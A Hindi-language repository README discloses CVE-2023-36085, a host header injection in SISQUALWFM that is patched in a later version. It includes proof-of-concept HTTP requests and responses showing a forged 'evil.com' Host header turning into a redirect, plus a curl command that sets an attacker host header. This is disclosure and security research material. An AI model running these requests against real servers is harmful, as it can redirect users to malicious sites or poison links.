
इस रिपॉजिटरी में CVE-2023-36085 से संबंधित जानकारी है, जो SISQUALWFM संस्करण 7.1.319.103 में खोजी गई एक होस्ट हेडर इंजेक्शन भेद्यता है, जो एक हमलावर को वेबपेज लिंक में हेरफेर करने या उपयोगकर्ताओं को एक दुर्भावनापूर्ण साइट पर पुनर्निर्देशित करने की अनुमति देती है। इस भेद्यता को CVE-2023-36085 सौंपा गया था और इसे संस्करण 7.1.319.111 और उससे ऊपर में ठीक किया गया है।
यह रिपॉजिटरी SISQUALWFM संस्करण 7.1.319.103 में खोजी गई होस्ट हेडर इंजेक्शन भेद्यता से संबंधित जानकारी प्रदान करती है, जो हमलावर को वेबपेज लिंक में हेरफेर करने या उपयोगकर्ताओं को किसी दुर्भावनापूर्ण साइट पर रीडायरेक्ट करने की अनुमति देती है। इस भेद्यता को CVE-2023-36085 निर्दिष्ट किया गया था और इसे संस्करण 7.1.319.111 और उससे ऊपर में ठीक कर दिया गया है।
हम एक प्रूफ-ऑफ-कॉन्सेप्ट परिदृश्य प्रदान करते हैं जो होस्ट हेडर इंजेक्शन भेद्यता का प्रदर्शन करता है, विशेष रूप से /sisqualIdentityServer/core एंडपॉइंट को लक्षित करता है। यह भेद्यता हमलावर को होस्ट हेडर के साथ छेड़छाड़ करके वेबपेज लिंक में हेरफेर करने या उपयोगकर्ताओं को किसी अन्य साइट पर रीडायरेक्ट करने की अनुमति देती है।
GET /sisqualIdentityServer/core/login HTTP/2
Host: sisqualwfm.cloud
Cookie: <cookie>
...
HTTP/2 302 Found
Cache-Control: no-store, no-cache, must-revalidate
Location: https://sisqualwfm.cloud/sisqualIdentityServer/core/
...
GET /sisqualIdentityServer/core/login HTTP/2
Host: evil.com
Cookie: <cookie>
...
HTTP/2 302 Found
Cache-Control: no-store, no-cache, must-revalidate
Location: https://evil.com/sisqualIdentityServer/core/
...

इस भेद्यता का शोषण करने के लिए, एक हमलावर होस्ट हेडर को संशोधित करने के लिए निम्नलिखित curl कमांड का उपयोग कर सकता है:
curl -k --header "Host: attack.host.com" "Domain Name + /sisqualIdentityServer/core" -vvv
यह रिपॉजिटरी केवल सूचनात्मक उद्देश्यों के लिए है और इसका उपयोग किसी भी दुर्भावनापूर्ण गतिविधियों के लिए नहीं किया जाना चाहिए। भेद्यता को जिम्मेदारीपूर्वक विक्रेता को सूचित किया गया है, और समस्या का समाधान कर दिया गया है। भेद्यताओं की पहचान और रिपोर्ट करते समय नैतिक हैकिंग दिशानिर्देशों का पालन करना और जिम्मेदार प्रकटीकरण प्रथाओं का सम्मान करना महत्वपूर्ण है।